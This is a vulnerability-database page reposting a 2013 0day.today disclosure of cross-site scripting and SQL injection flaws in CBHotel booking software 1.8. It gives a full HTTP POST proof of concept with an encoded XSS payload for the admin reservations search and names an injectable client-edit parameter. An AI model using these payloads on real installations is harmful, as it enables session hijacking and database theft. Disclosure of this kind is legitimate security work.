Lucene search

K

CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities

๐Ÿ—“๏ธย 22 Aug 2013ย 00:00:00Reported byย Dylan IrziTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 16ย Views

CBHotel Software and Booking System 1.8 - Multiple Vulnerabilities found in Cross Site Scripting and SQL Injectio

Show more
Code
*Cross Site Scripting:*
Archivos Afectados Afectados
 
http://localhost/cbadm/reservations/index.php?ac=search
-------------------------------------------------------------------
PoC:
*Cross Site Scripting Post.*
URL: http://server/cbadm/reservations/index.php?ac=search
 
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.cbhotel.eu/cbadm/adm_main.php
Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
-------------------------------------------------------------------
s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok
-------------------------------------------------------------------
*SQL Injection*
 
http://localhost/cbadm/clients/edit_client.php?id=1(SQL Injection)

#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Aug 2013 00:00Current
7.8High risk
Vulners AI Score7.8
16
.json
Report